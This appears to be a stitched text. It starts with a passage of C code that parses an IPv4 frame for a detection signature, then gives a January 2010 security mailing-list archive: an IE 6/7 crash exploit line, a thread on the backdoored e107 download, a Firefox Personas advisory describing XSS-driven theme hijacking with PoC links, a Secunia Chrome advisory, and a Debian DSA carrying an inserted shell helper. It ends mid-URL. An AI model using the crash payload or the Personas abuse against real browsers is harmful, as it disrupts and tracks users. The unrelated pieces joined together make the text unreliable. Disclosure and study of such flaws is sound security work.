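/* RFC 1071 one's-complement sum; over a valid header (checksum field
 * included) the result is 0. */
uint16_t ip_checksum(const uint8_t *hdr, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)hdr[i] << 8) | hdr[i + 1];
    if (len & 1)
        sum += (uint32_t)hdr[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Fill r from an Ethernet frame; returns 0 on success, -1 if not IPv4 or
 * truncated. Length checks come first so a short frame cannot over-read. */
int analyze_frame(const uint8_t *f, size_t len, struct frame_report *r)
{
    memset(r, 0, sizeof *r);
    r->len = len;
    if (len < 14 + 20) return -1;
    r->ipv4 = (f[12] == 0x08 && f[13] == 0x00);
    if (!r->ipv4) return -1;

    const uint8_t *ip = f + 14;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < 20 || 14 + ihl > len) return -1;

    uint16_t total   = (uint16_t)((ip[2] << 8) | ip[3]);
    r->total_len_ok  = (total == len - 14);
    r->checksum_ok   = (ip_checksum(ip, ihl) == 0);
    r->proto         = ip[9];
    r->src = ((uint32_t)ip[12] << 24) | ((uint32_t)ip[13] << 16) |
             ((uint32_t)ip[14] << 8) | ip[15];
    r->dst = ((uint32_t)ip[16] << 24) | ((uint32_t)ip[17] << 16) |
             ((uint32_t)ip[18] << 8) | ip[19];
    r->dst_is_zero = (r->dst == 0);
    return 0;
}

/* Convenience entry point: decode and analyze the posted frame. */
int report_posted_frame(struct frame_report *r)
{
    uint8_t buf[256];
    int n = hex_to_bytes(kPostedFrameHex, buf, sizeof buf);
    if (n < 0) return -1;
    return analyze_frame(buf, (size_t)n, r);
}

int main(void)
{
    struct frame_report r;
    if (report_posted_frame(&r) != 0) return 1;
    printf("len=%zu ipv4=%d total_len_ok=%d checksum_ok=%d proto=%u "
           "dst_is_zero=%d\n", r.len, r.ipv4, r.total_len_ok,
           r.checksum_ok, r.proto, r.dst_is_zero);
    return 0;
}
```

The valid checksum is worth noting for detection: the frame is well formed at
the IP layer, so a signature has to key on the destination address itself
rather than on a malformed header.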



Microsoft IE 6&7 Crash Exploit

2010-01-26 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Microsoft IE
# Version: 6 & 7
# Tested on : XP(SP1/SP2/SP3)
#
# Vulnerability Info:
# Type: Crash
# Risk: Medium
#
Vulnerability:

IE.html
document.createElement("html").outerHTML
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###


Re: [Full-disclosure] e107 latest download link is backdoored

2010-01-26 Thread Gregor Schneider
Seems as if e107.org now is spreading some bad stuff:

Virus/Spyware Mal/ObfJS-CB! - at least that's what Sophos is telling me

Wondering why the admins of e107.org still keep this site up & running
- the site should have been taken down right after they saw that it was
compromised.

Irresponsible from the e107.org-guys, imho...

Gregor
-- 
just because you're paranoid, doesn't mean they're not after you...
gpgp-fp: 79A84FA526807026795E4209D3B3FE028B3170B2
gpgp-key available
@ http://pgpkeys.pca.dfn.de:11371
@ http://pgp.mit.edu:11371/
skype:rc46fi


Re: [Full-disclosure] e107 latest download link is backdoored

2010-01-26 Thread David Sopas
How did they not notice that, so obvious, right? There are so many spam
links on the source page. They should fix it ASAP and check logs for
other possible modifications.


2010/1/26 Carsten Eilers :
> Hi,
>
> Bogdan Calin wrote on Mon, 25 Jan 2010 12:58:50 +0200:
>
>>The latest version of e107, version 0.7.17 contains a PHP backdoor.
>>http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip
>
> The start page of e107.org, ,
> contains suspect, probably malicious JavaScript code at the
> top, followed by many links in the format
> medical spam,
> before the DOCTYPE declaration.
>
>
> Regards
>  Carsten
>
> --
> Dipl.-Inform. Carsten Eilers
> IT Security and Data Protection
>
> 
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


Re: e107 latest download link is backdoored

2010-01-26 Thread Carsten Eilers
Hi,

Bogdan Calin wrote on Mon, 25 Jan 2010 12:58:50 +0200:

>The latest version of e107, version 0.7.17 contains a PHP backdoor.
>http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

The start page of e107.org, ,
contains suspect, probably malicious JavaScript code at the
top, followed by many links in the format
medical spam,
before the DOCTYPE declaration. 


Regards
  Carsten

-- 
Dipl.-Inform. Carsten Eilers
IT Security and Data Protection



Setting arbitrary Personas without user interaction in Firefox 3.6

2010-01-26 Thread Artur Janc
---
  Title: Setting arbitrary Personas without user interaction in Firefox 3.6
Product: Mozilla Firefox
Version: 3.6
    PoC: http://wtikay.com/personas/
     By: Artur Janc
   Date: 01/26/2010
---

1. OVERVIEW

The recent release of Firefox 3.6 introduces support for browser "Personas"
-- lightweight image-based themes which alter the look and feel of the
browser chrome.

A malicious website can set a user's Persona to an arbitrary theme, disable
Undo functionality in the browser's information bar, and obfuscate the Persona
entry in the Themes pane of the Tools | Add-ons pane to make the detection and
deletion of a rogue theme somewhat more difficult.

2. DETAILS

2.1. Behavior

The ability to install or preview Personas is controlled by the same Allowed
Sites whitelist as for installing Firefox extensions. However, contrary to the
extensions installation process, setting Personas does *not* require the user's
explicit agreement (for example the post-upgrade "firstrun" page previews
featured Personas on hover). To give users control of the currently set
Persona, Firefox displays an information bar with "Undo" and "Manage Themes"
buttons upon any Persona-related action (preview or installation).

2.2. Vulnerability Description
Any XSS vulnerability in one of the two hosts whitelisted by default
(getpersonas.com and addons.mozilla.org) will allow the attacker to install and
activate an arbitrary Persona using a JavaScript event with a properly
specified DOM element as an argument, without prompting the user.

The PoC uses XSS in http://www.getpersonas.com/en-US/gallery/Designer/XXX

Setting the same rogue theme twice in quick succession will render the Undo
button useless, as the "previous" theme will be the same as the last one set by
the attacker.

The user will be able to click "Manage Themes" on the information bar to view
installed themes. However, all pieces of Persona-related information shown in
the list are controlled by the attacker, so nothing prohibits the attacker from
calling her theme "Default", setting the author to "Mozilla Corp." and setting
an innocuous icon and "preview" image to resemble the default Firefox theme.
The same Persona can be installed with multiple IDs to introduce clutter in the
menu and make detecting the rogue Persona and cleaning up the list more
painful.

2.3. Proof of Concept
http://wtikay.com/personas/
http://wtikay.com/personas/persona-non-grata.js

3. IMPACT

This issue might cause some inconvenience to users whose browsers' UI suddenly
starts showing intrusive ads or pornography, or becomes completely garbled
(see PoC), especially those not savvy enough to figure out which of the
installed Personas is causing the problem. Another, more surreptitious and
troubling possibility is to install a Persona indistinguishable from the
default theme (i.e.  transparent image) and use a custom updateURL argument to
get the victim's browser to periodically phone home to the attacker's
webserver, potentially enabling some level of user tracking.

4. FIX

To ensure that Personas cannot be automatically set by malicious websites,
Firefox should follow the model it adopted with browser extensions and prompt
the user before installing any new Persona. In the absence of such a fix, it is
necessary to audit all whitelisted Mozilla hosts for XSS vulnerabilities
(probably a good idea anyway) and hope that site updates don't introduce any
new ones.

5. DISCLOSURE

Since the immediate workaround for this problem is to patch XSS vulnerabilities
on Mozilla webservers, which doesn't require pushing client-side updates,
Mozilla is notified by receiving a copy of this report.


Secunia Research: Google Chrome Pop-Up Block Menu Handling Vulnerability

2010-01-26 Thread Secunia Research
== 

 Secunia Research 26/01/2010

 - Google Chrome Pop-Up Block Menu Handling Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Google Chrome 3.0.195.38

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

"Google Chrome runs web pages and applications with lightning speed."

Product Link:
http://www.google.com/chrome

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Google Chrome, 
which can be exploited by malicious people to potentially compromise 
a user's system.

The vulnerability is caused by a use-after-free error when trying to 
display a blocked pop-up window while navigating away from the 
current site.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Upgrade to version 4.0.249.78.

== 
6) Time Table 

30/12/2009 - Vendor notified.
30/12/2009 - Vendor response.
26/01/2010 - Public disclosure.

== 
7) Credits 

Discovered by Jakob Balle and Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has not 
currently assigned a CVE identifier for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-65/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


[SECURITY] [DSA-1977-1] New python packages fix several vulnerabilities

2010-01-26 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1977-1                    secur...@debian.org
http://www.debian.org/security/                          Giuseppe Iuculano
January 25, 2010                       http://www.debian.org/security/faq
- 

Packages   : python2.4 python2.5
Vulnerability  : several vulnerabilities
Problem type   : local (remote)
Debian-specific: no
CVE Id : CVE-2008-2316 CVE-2009-3560 CVE-2009-3720
Debian Bug : 493797 560912 560913


Jukka Taimisto, Tero Rontti and Rauli Kaksonen discovered that the embedded
Expat copy in the interpreter for the Python language does not properly
process malformed or crafted XML files (CVE-2009-3560, CVE-2009-3720). This
vulnerability could allow an attacker to cause a denial of service while
parsing a malformed XML file.

In addition, this update fixes an integer overflow in the hashlib module in
python2.5. This vulnerability could allow an attacker to defeat cryptographic
digests (CVE-2008-2316). It only affects the oldstable distribution (etch).


For the oldstable distribution (etch), these problems have been fixed in
version 2.4.4-3+etch3 for python2.4 and version 2.5-5+etch2 for python2.5.

For the stable distribution (lenny), these problems have been fixed in
version 2.4.6-1+lenny1 for python2.4 and version 2.5.2-15+lenny1 for python2.5.

For the unstable distribution (sid), these problems have been fixed in
version 2.5.4-3.1 for python2.5, and will migrate to the testing distribution
(squeeze) shortly. python2.4 has been removed from the testing distribution
(squeeze), and it will be removed from the unstable distribution soon.


We recommend that you upgrade your python packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
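As an added example (not part of the DSA), a POSIX sh helper that checks a downloaded .deb against the "Size/MD5 checksum" pair the advisory prints beneath each package URL before the file is handed to dpkg -i; the package name and URL used in the comments are constructed.

```shell
#!/bin/sh
# Added example, not part of the DSA: check a downloaded package against the
# "Size/MD5 checksum: SIZE MD5" pair the advisory prints under each URL before
# running "dpkg -i". MD5 only catches a corrupted or swapped download; it is
# not a substitute for the signed Release files that apt verifies.

# verify_deb FILE SIZE MD5 -> returns 0 only if both size and MD5 match
verify_deb() {
    file=$1; want_size=$2; want_md5=$3
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    have_size=$(wc -c < "$file" | tr -d ' ')
    if command -v md5sum >/dev/null 2>&1; then
        have_md5=$(md5sum "$file" | cut -d' ' -f1)
    else
        have_md5=$(md5 -q "$file")          # BSD / macOS fallback
    fi
    [ "$have_size" = "$want_size" ] || { echo "size mismatch: $file" >&2; return 1; }
    [ "$have_md5" = "$want_md5" ] || { echo "MD5 mismatch: $file" >&2; return 1; }
    echo "OK: $file"
}

# verify_dsa_list < ADVISORY_EXCERPT
# Reads the advisory's URL / "Size/MD5 checksum:" line pairs from stdin and
# verifies each file by its basename in the current directory. Returns 1 if
# any entry is missing or fails; every entry is still reported.
verify_dsa_list() {
    rc=0; url=""
    while IFS= read -r line; do
        case "$line" in
            *http://*|*https://*)
                url=$(printf '%s' "$line" | sed 's/^[[:space:]]*//') ;;
            *Size/MD5*)
                [ -n "$url" ] || continue
                # unquoted on purpose: splits the "SIZE MD5" tail into $1 $2
                set -- $(printf '%s' "$line" | sed 's/.*checksum:[[:space:]]*//')
                verify_deb "${url##*/}" "$1" "$2" || rc=1
                url="" ;;
        esac
    done
    return "$rc"
}

# Typical use after "wget" of a package named in the advisory (constructed name):
#   verify_deb file.deb SIZE MD5 && dpkg -i file.deb
```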


Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5_2.5-5+etch2.dsc
Size/MD5 checksum: 1313 61c8f540d768731518e649f759ad1500
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4-3+etch3.dsc
Size/MD5 checksum: 1210 647efe66b35aa00c2f0416e41920fdf8
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4.orig.tar.gz
Size/MD5 checksum:  9508940 f74ef9de91918f8927e75e8c3024263a
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4-3+etch3.diff.gz
Size/MD5 checksum:   207460 c9b1b80a1aae12db910e353dab5cd0fb
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5_2.5-5+etch2.diff.gz
Size/MD5 checksum:   271887 2d1944512d0eaa925a4a158b2c3a5845
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5_2.5.orig.tar.gz
Size/MD5 checksum: 11010528 2ce301134620012ad6dafb27bbcab7eb

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/p/python2.5/idle-python2.5_2.5-5+etch2_all.deb
Size/MD5 checksum:62226 9de6fad0cf4c106d77c4189ecf3f0fab
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4-examples_2.4.4-3+etch3_all.deb
Size/MD5 checksum:   589766 e33c071f8e1864e1c5a63d2e39f21d2f
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5-examples_2.5-5+etch2_all.deb
Size/MD5 checksum:   645704 8732b224b59cd6488596117d074831f9
  
http://security.debian.org/pool/updates/main/p/python2.4/idle-python2.4_2.4.4-3+etch3_all.deb
Size/MD5 checksum:60154 8ac06e4c9ad4c1830ee90ece429690fe

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4-3+etch3_alpha.deb
Size/MD5 checksum:  2943634 e5ab4789b18f9ac953b6b101ec897616
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5-dbg_2.5-5+etch2_alpha.deb
Size/MD5 checksum:  6082828 772c99f5e8dc4e7c9306ba4a61837565
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.4-3+etch3_alpha.deb
Size/MD5 checksum:  1850092 a19fd86a326d42a31ed75d1f1272d94c
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5-minimal_2.5-5+etch2_alpha.deb
Size/MD5 checksum:   849306 6c7cfd716177bc3677729ef27cd533ff
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.4-3+etch3_alpha.deb
Size/MD5 checksum:  5248986 20d49174384d0533b25edfbc6f03
  
http://security.debian.org/pool/updates/main/p